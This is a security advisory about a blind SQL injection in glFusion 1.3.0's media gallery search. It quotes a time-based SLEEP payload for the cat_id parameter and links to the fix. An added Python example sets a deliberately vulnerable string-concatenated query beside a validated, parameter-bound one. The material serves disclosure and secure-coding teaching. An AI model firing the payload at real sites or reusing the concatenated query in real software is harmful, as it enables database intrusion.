Source: 自学PHP网 Date: 2015-04-17 10:15
Information
--------------------
Name: SQL Injection Vulnerability in glFusion
Software: glFusion 1.3.0 and possibly below.
Homepage: http://www.glfusion.org
Vulnerability Type: Blind SQL Injection
Researcher: Omar Kurt

Overview
--------------------
A dynamic system based on flexible and granular permissions, with spam protection, forums, file management, media gallery, calendars, polls, site-wide search, RSS feeds, and more!

Technical Summary
--------------------
glFusion is affected by a SQL Injection vulnerability in version 1.3.0.
Example PoC URL is as follows:

Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param: cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

You can read the full article about SQL Injection vulnerabilities here: http://www.mavitunasecurity.com/sql-injection/

Solution
--------------------
http://www.glfusion.org/article.php/glfusion131

Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
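The cat_id value in the PoC only works when request input is pasted inside a quoted SQL literal. The following added example (not glFusion's code and not part of the advisory) shows that pattern beside a validated, bound-parameter lookup. Assumptions: SQLite stands in for the MySQL backend, and the `media` table, its sample rows and all function names are hypothetical.

```python
import sqlite3

# cat_id value quoted in the advisory's PoC
ADVISORY_VALUE = "'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'"

def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE media (id INTEGER PRIMARY KEY, cat_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO media (cat_id, title) VALUES (?, ?)",
                   [(1, "beach.jpg"), (1, "city.jpg"), (2, "forest.jpg")])
    return db

def search_concatenated(db, raw_cat_id):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT title FROM media WHERE cat_id = '" + raw_cat_id + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def parse_cat_id(raw):
    """Accept only a short, plain decimal integer; anything else is None."""
    if isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 10:
        return int(raw)
    return None

def search_bound(db, raw_cat_id):
    """Hardened pattern: validate the type first, then bind as a parameter."""
    cat_id = parse_cat_id(raw_cat_id)
    if cat_id is None:
        return []  # rejected before any SQL is built
    rows = db.execute("SELECT title FROM media WHERE cat_id = ? ORDER BY id", (cat_id,))
    return [row[0] for row in rows]

def reaches_sql_parser(db, raw_cat_id):
    """True when the engine tried to resolve the value as SQL, not as data."""
    try:
        search_concatenated(db, raw_cat_id)
    except sqlite3.OperationalError as exc:
        # SQLite has no SLEEP(); this error means the value was parsed as
        # an expression. MySQL would evaluate it instead of failing.
        return "no such function" in str(exc)
    return False

if __name__ == "__main__":
    db = make_db()
    print("concatenated, parsed as SQL:", reaches_sql_parser(db, ADVISORY_VALUE))
    print("bound, advisory value:", search_bound(db, ADVISORY_VALUE))
    print("bound, cat_id=1:", search_bound(db, "1"))
```
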